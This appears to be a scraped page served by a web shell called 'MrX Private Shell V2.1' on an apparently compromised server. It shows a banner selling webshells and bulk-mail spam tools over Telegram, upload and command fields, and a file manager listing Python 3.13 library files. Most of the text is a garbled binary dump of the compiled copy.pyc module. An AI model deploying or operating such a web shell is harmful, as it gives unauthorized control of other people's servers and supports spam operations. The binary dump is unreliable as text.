__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
�

*�_i#��x�SrSSKrSSKrSSKJr "SS\5r\r/SQrSr	0=r
rSr\R\\\\\\\\\\\\\R4\R6\R8\R:\R<\R>4Hr \\\ 'M
 \!R\\!'\"R\\"'\#R\\#'\$R\\$'CC S/4S	jr%0=r&rS
r'\'\\R'\'\\R6'\'\\R8'\'\\'\'\\'\'\\'\'\\'\'\\'\'\\'\'\\R<'\'\\'\'\\'\'\\R4'\'\\R:'\'\\R>'\'\\'\%4Sjr(\(\\!'\%4Sjr)\)\\'\%4S
jr*\*\\"'Sr+\+\\RX'CSr-S\%S.Sjjr.CCSr/g)a9Generic (shallow and deep) copying operations.

Interface summary:

        import copy

        x = copy.copy(y)                # make a shallow copy of y
        x = copy.deepcopy(y)            # make a deep copy of y
        x = copy.replace(y, a=1, b=2)   # new object with fields replaced, as defined by `__replace__`

For module specific errors, copy.Error is raised.

The difference between shallow and deep copying is only relevant for
compound objects (objects that contain other objects, like lists or
class instances).

- A shallow copy constructs a new compound object and then (to the
  extent possible) inserts *the same objects* into it that the
  original contains.

- A deep copy constructs a new compound object and then, recursively,
  inserts *copies* into it of the objects found in the original.

Two problems often exist with deep copy operations that don't exist
with shallow copy operations:

 a) recursive objects (compound objects that, directly or indirectly,
    contain a reference to themselves) may cause a recursive loop

 b) because deep copy copies *everything* it may copy too much, e.g.
    administrative data structures that should be shared even between
    copies

Python's deep copy operation avoids these problems by:

 a) keeping a table of objects already copied during the current
    copying pass

 b) letting user-defined classes override the copying operation or the
    set of components copied

This version does not copy types like module, class, function, method,
nor stack trace, stack frame, nor file, socket, window, nor any
similar types.

Classes can use the same interfaces to control copying that they use
to control pickling: they can define methods called __getinitargs__(),
__getstate__() and __setstate__().  See the documentation for module
"pickle" for information on these methods.
�N)�dispatch_tablec��\rSrSrSrg)�Error�8�N)�__name__�
__module__�__qualname__�__firstlineno__�__static_attributes__r��/usr/lib/python3.13/copy.pyrr8s��r
r)r�copy�deepcopy�replacec���[U5n[RU5nU(aU"U5$[U[5(a[	U5$[USS5nUbU"U5$[R"U5nUb	U"U5nOC[USS5nUb	U"S5nO*[USS5nU(aU"5nO[SU-5e[U[5(aU$[US/UQ76$)zdShallow copy operation on arbitrary Python objects.

See the module's __doc__ string for more info.
�__copy__N�
__reduce_ex__��
__reduce__z%un(shallow)copyable object of type %s)�type�_copy_dispatch�get�
issubclass�_copy_immutable�getattrrr�
isinstance�str�_reconstruct)�x�cls�copier�reductor�rvs     rrr>s����q�'�C�
�
�
��
$�F�
��a�y���#�t����q�!�!�
�S�*�d�
+�F�
���a�y���!�!�#�&�H���
�a�[���1�o�t�4�����!��B��q�,��5�H���Z���C�c�I�J�J��"�c�������4�%�"�%�%r
c��U$�Nr)r s rrrg����Hr
c�b�[U5nUc0nOURX25nXBLaU$[U5n[RU5nUb	U"X5nO�[	U[5(a[X5nO�[
USS5nUb	U"U5nO�[R"U5nU(a	U"U5nOC[
USS5nUb	U"S5nO*[
USS5nU(aU"5nO[SU-5e[U[5(aUnO[X/UQ76nX@LaXAU'[X5 U$)zaDeep copy operation on arbitrary Python objects.

See the module's __doc__ string for more info.
N�__deepcopy__rrrz"un(deep)copyable object of type %s)
�idrr�_deepcopy_dispatchr�_deepcopy_atomicrrrrrr�_keep_alive)	r �memo�_nil�d�yr!r"r#r$s	         rrrws/��	�1��A��|����H�H�Q����=��H�
�q�'�C�
�
#�
#�C�
(�F�
���1�O���c�4� � � ��)�A��Q���5�F��!��4�L��)�-�-�c�2���!�!��B�&�q�/�4�@�H��+�%�a�[��#*�1�l�D�#A��#�!)��B�"'� D�s� J�#L�L��b�#�&�&��A�$�Q�2�r�2�A�	�z��Q���A���Hr
c��U$r&r�r r.s  rr,r,�r'r
c�j�/nX1[U5'URnUHnU"U"XQ55 M U$r&)r*�append)r r.rr1r5�as      r�_deepcopy_listr7�s7��
�A���A��K�
�X�X�F�
���x�� �!���Hr
c���UVs/sH
o2"X15PM nnU[U5$s snf![a Of=f[X5HupVXVLdM[U5n U$ UnU$r&)r*�KeyError�zip�tuple)r r.rr6r1�k�js       r�_deepcopy_tupler>�s{��$%�&�A�q��!�	�A�A�&�
��B�q�E�{���		'��
�
��
���A�	����:��a��A��
�H�
�

���Hs�'�
,�
9�9c�v�0nX1[U5'UR5HupEU"XQ5X2"XA5'M U$r&)r*�items)r r.rr1�key�values      r�_deepcopy_dictrC�s=��
�A���A��K��g�g�i�
��!)�%�!6��(�3�
�� ��Hr
c�b�[U5"UR[URU55$r&)r�__func__r�__self__r3s  r�_deepcopy_methodrG�s"����7�1�:�:�x��
�
�D�9�:�:r
c�~�U[U5RU5 g![a U/U[U5'gf=f)a1Keeps a reference to the object x in the memo.

Because we remember objects by their id, we have
to assure that possibly temporary objects are kept
alive by referencing them.
We store a reference at the id of the memo, which should
normally not be used unless someone tries to deepcopy
the memo itself...
N)r*r5r9r3s  rr-r-�s;����R��X����a� �����s��R��X���s� �<�<)rc��^^�TSLnU(aU(a
UU4SjU5nU"U6n	U(aU	T[U5'Ub�U(a	T"UT5n[U	S5(aU	RU5 Oq[U[5(a[U5S:XaUupJOSn
UbU	RRU5 U
b%U
R5Hup�[X�U5 M UbEU(a$UHn
T"U
T5n
U	RU
5 M OUHn
U	RU
5 M Ub9U(a#UHup�T"UT5nT"UT5nX�U'M U	$UH	up�X�U'M U	$)Nc3�6># �UHnT"UT5v� M g7fr&r)�.0�argrr.s  ��r�	<genexpr>�_reconstruct.<locals>.<genexpr>�s����4�t����d�#�#�t�s��__setstate__�)r*�hasattrrOrr;�len�__dict__�updater@�setattrr5)r r.�func�args�state�listiter�dictiterr�deepr1�	slotstaterArB�items `     `      rrr�s^����t��D���4�t�4���d��A����R��U������U�D�)�E��1�n�%�%�
�N�N�5�!��%��'�'�C��J�!�O�#(� ��y� �	�� ��
�
�!�!�%�(��$�"+�/�/�"3�J�C��A�E�*�#4���� ����d�+�������!�!�������!����&�
���s�D�)�� ���-���#��'�
�H�'�
���#��'��Hr
c�~�URn[USS5nUc[SURS35eU"U40UD6$)z�Return a new object replacing specified fields with new values.

This is especially useful for immutable objects, like named tuples or
frozen dataclasses.
�__replace__Nzreplace() does not support z objects)�	__class__r�	TypeErrorr)�obj�changesr!rVs    rrr(sI���-�-�C��3�
�t�,�D��|��5�c�l�l�^�8�L�M�M����w��r
)NNN)0�__doc__�types�weakref�copyregr�	Exceptionr�error�__all__rrr0r�NoneType�int�float�bool�complexrr;�bytes�	frozensetr�range�slice�property�BuiltinFunctionType�EllipsisType�NotImplementedType�FunctionType�CodeType�ref�t�list�dict�set�	bytearrayrr+r,r7r>rCrG�
MethodTyper-rrrr
r�<module>r�s0��1�f
��"�	�I�	�
��
2��$&�N����
�
�.�.�#�u�d�G�S�%�
��D�%���
�
#�
#�U�%7�%7�
�
"�
"�E�$6�$6����
�+�+�	
�A�
�A�a�D�
��)�)��$��
�)�)��$��	����#���~�~��)���q���2
�h���Q�
�$��%�.�.��(��%����.��%����	��#����%��
��$��
��'�
���%��	��#��$��%�.�.��
��$����%��/��%����(��%����!��'�+�+����(��%-�
���$��&.�
���%��%-�
���$��;�&��%������"6:�+
�%�+
�Z
�7�
 r

Filemanager

Name Type Size Permission Actions
__future__.cpython-313.pyc File 4.61 KB 0644
__hello__.cpython-313.pyc File 966 B 0644
_aix_support.cpython-313.pyc File 4.61 KB 0644
_android_support.cpython-313.pyc File 7.44 KB 0644
_apple_support.cpython-313.pyc File 3.4 KB 0644
_collections_abc.cpython-313.pyc File 45.6 KB 0644
_colorize.cpython-313.pyc File 3.92 KB 0644
_compat_pickle.cpython-313.pyc File 7.02 KB 0644
_compression.cpython-313.pyc File 7.62 KB 0644
_distutils_system_mod.cpython-313.pyc File 7.89 KB 0644
_ios_support.cpython-313.pyc File 2.65 KB 0644
_markupbase.cpython-313.pyc File 12.14 KB 0644
_opcode_metadata.cpython-313.pyc File 10.43 KB 0644
_osx_support.cpython-313.pyc File 17.7 KB 0644
_py_abc.cpython-313.pyc File 7.02 KB 0644
_pydatetime.cpython-313.pyc File 92.36 KB 0644
_pydecimal.cpython-313.pyc File 211.95 KB 0644
_pyio.cpython-313.pyc File 108.59 KB 0644
_pylong.cpython-313.pyc File 10.9 KB 0644
_sitebuiltins.cpython-313.pyc File 4.79 KB 0644
_strptime.cpython-313.pyc File 28.04 KB 0644
_sysconfigdata__linux_x86_64-linux-gnu.cpython-313.pyc File 60.07 KB 0644
_sysconfigdata__x86_64-linux-gnu.cpython-313.pyc File 60.06 KB 0644
_threading_local.cpython-313.pyc File 8.19 KB 0644
_weakrefset.cpython-313.pyc File 11.77 KB 0644
abc.cpython-313.pyc File 7.73 KB 0644
antigravity.cpython-313.pyc File 985 B 0644
argparse.cpython-313.pyc File 102.11 KB 0644
ast.cpython-313.pyc File 100.56 KB 0644
base64.cpython-313.pyc File 25.21 KB 0644
bdb.cpython-313.pyc File 39.61 KB 0644
bisect.cpython-313.pyc File 3.42 KB 0644
bz2.cpython-313.pyc File 14.81 KB 0644
cProfile.cpython-313.pyc File 8.46 KB 0644
calendar.cpython-313.pyc File 38.76 KB 0644
cmd.cpython-313.pyc File 18.52 KB 0644
code.cpython-313.pyc File 15.41 KB 0644
codecs.cpython-313.pyc File 39.59 KB 0644
codeop.cpython-313.pyc File 6.48 KB 0644
colorsys.cpython-313.pyc File 4.4 KB 0644
compileall.cpython-313.pyc File 20.22 KB 0644
configparser.cpython-313.pyc File 67.32 KB 0644
contextlib.cpython-313.pyc File 29.78 KB 0644
contextvars.cpython-313.pyc File 261 B 0644
copy.cpython-313.pyc File 10.38 KB 0644
copyreg.cpython-313.pyc File 7.36 KB 0644
csv.cpython-313.pyc File 20.21 KB 0644
dataclasses.cpython-313.pyc File 46.7 KB 0644
datetime.cpython-313.pyc File 411 B 0644
decimal.cpython-313.pyc File 2.93 KB 0644
difflib.cpython-313.pyc File 70.35 KB 0644
dis.cpython-313.pyc File 46.4 KB 0644
doctest.cpython-313.pyc File 105.01 KB 0644
enum.cpython-313.pyc File 83.7 KB 0644
filecmp.cpython-313.pyc File 14.67 KB 0644
fileinput.cpython-313.pyc File 20.15 KB 0644
fnmatch.cpython-313.pyc File 6.64 KB 0644
fractions.cpython-313.pyc File 37.42 KB 0644
ftplib.cpython-313.pyc File 41.34 KB 0644
functools.cpython-313.pyc File 41.26 KB 0644
genericpath.cpython-313.pyc File 7.63 KB 0644
getopt.cpython-313.pyc File 8.27 KB 0644
getpass.cpython-313.pyc File 7.14 KB 0644
gettext.cpython-313.pyc File 22.35 KB 0644
glob.cpython-313.pyc File 23.11 KB 0644
graphlib.cpython-313.pyc File 9.96 KB 0644
gzip.cpython-313.pyc File 31.23 KB 0644
hashlib.cpython-313.pyc File 7.99 KB 0644
heapq.cpython-313.pyc File 17.35 KB 0644
hmac.cpython-313.pyc File 10.41 KB 0644
imaplib.cpython-313.pyc File 61.18 KB 0644
inspect.cpython-313.pyc File 132.7 KB 0644
io.cpython-313.pyc File 4.17 KB 0644
ipaddress.cpython-313.pyc File 89.47 KB 0644
keyword.cpython-313.pyc File 1.02 KB 0644
linecache.cpython-313.pyc File 8.35 KB 0644
locale.cpython-313.pyc File 57.63 KB 0644
lzma.cpython-313.pyc File 15.35 KB 0644
mailbox.cpython-313.pyc File 115.95 KB 0644
mimetypes.cpython-313.pyc File 24.31 KB 0644
modulefinder.cpython-313.pyc File 27.73 KB 0644
netrc.cpython-313.pyc File 8.93 KB 0644
ntpath.cpython-313.pyc File 26.56 KB 0644
nturl2path.cpython-313.pyc File 2.67 KB 0644
numbers.cpython-313.pyc File 13.45 KB 0644
opcode.cpython-313.pyc File 3.97 KB 0644
operator.cpython-313.pyc File 16.96 KB 0644
optparse.cpython-313.pyc File 66 KB 0644
os.cpython-313.pyc File 44.75 KB 0644
pdb.cpython-313.pyc File 103.62 KB 0644
pickle.cpython-313.pyc File 76.57 KB 0644
pickletools.cpython-313.pyc File 78.54 KB 0644
pkgutil.cpython-313.pyc File 19.49 KB 0644
platform.cpython-313.pyc File 43.63 KB 0644
plistlib.cpython-313.pyc File 42.09 KB 0644
poplib.cpython-313.pyc File 17.99 KB 0644
posixpath.cpython-313.pyc File 17.7 KB 0644
pprint.cpython-313.pyc File 29 KB 0644
profile.cpython-313.pyc File 22.03 KB 0644
pstats.cpython-313.pyc File 36.97 KB 0644
pty.cpython-313.pyc File 7.23 KB 0644
py_compile.cpython-313.pyc File 9.83 KB 0644
pyclbr.cpython-313.pyc File 14.79 KB 0644
pydoc.cpython-313.pyc File 136.68 KB 0644
queue.cpython-313.pyc File 16.94 KB 0644
quopri.cpython-313.pyc File 9.34 KB 0644
random.cpython-313.pyc File 34.43 KB 0644
reprlib.cpython-313.pyc File 10.18 KB 0644
rlcompleter.cpython-313.pyc File 8.37 KB 0644
runpy.cpython-313.pyc File 14.05 KB 0644
sched.cpython-313.pyc File 7.42 KB 0644
secrets.cpython-313.pyc File 2.45 KB 0644
selectors.cpython-313.pyc File 25.74 KB 0644
shelve.cpython-313.pyc File 12.98 KB 0644
shlex.cpython-313.pyc File 14.5 KB 0644
shutil.cpython-313.pyc File 65.87 KB 0644
signal.cpython-313.pyc File 4.44 KB 0644
site.cpython-313.pyc File 31.86 KB 0644
sitecustomize.cpython-313.pyc File 299 B 0644
smtplib.cpython-313.pyc File 46.25 KB 0644
socket.cpython-313.pyc File 41.23 KB 0644
socketserver.cpython-313.pyc File 33.84 KB 0644
sre_compile.cpython-313.pyc File 627 B 0644
sre_constants.cpython-313.pyc File 630 B 0644
sre_parse.cpython-313.pyc File 623 B 0644
ssl.cpython-313.pyc File 63.68 KB 0644
stat.cpython-313.pyc File 5.39 KB 0644
statistics.cpython-313.pyc File 69.43 KB 0644
string.cpython-313.pyc File 11.38 KB 0644
stringprep.cpython-313.pyc File 24.67 KB 0644
struct.cpython-313.pyc File 325 B 0644
subprocess.cpython-313.pyc File 79.8 KB 0644
symtable.cpython-313.pyc File 22.65 KB 0644
tabnanny.cpython-313.pyc File 12.13 KB 0644
tarfile.cpython-313.pyc File 122.79 KB 0644
tempfile.cpython-313.pyc File 48.68 KB 0644
textwrap.cpython-313.pyc File 17.51 KB 0644
this.cpython-313.pyc File 1.38 KB 0644
threading.cpython-313.pyc File 61.72 KB 0644
timeit.cpython-313.pyc File 14.29 KB 0644
token.cpython-313.pyc File 3.49 KB 0644
tokenize.cpython-313.pyc File 24.84 KB 0644
trace.cpython-313.pyc File 33.17 KB 0644
traceback.cpython-313.pyc File 69.38 KB 0644
tracemalloc.cpython-313.pyc File 26.77 KB 0644
tty.cpython-313.pyc File 2.6 KB 0644
turtle.cpython-313.pyc File 171.21 KB 0644
types.cpython-313.pyc File 15.18 KB 0644
typing.cpython-313.pyc File 150.96 KB 0644
uuid.cpython-313.pyc File 31.4 KB 0644
warnings.cpython-313.pyc File 28.85 KB 0644
wave.cpython-313.pyc File 32.44 KB 0644
weakref.cpython-313.pyc File 31.06 KB 0644
webbrowser.cpython-313.pyc File 26.26 KB 0644
zipapp.cpython-313.pyc File 10.15 KB 0644
zipimport.cpython-313.pyc File 25.89 KB 0644
Filemanager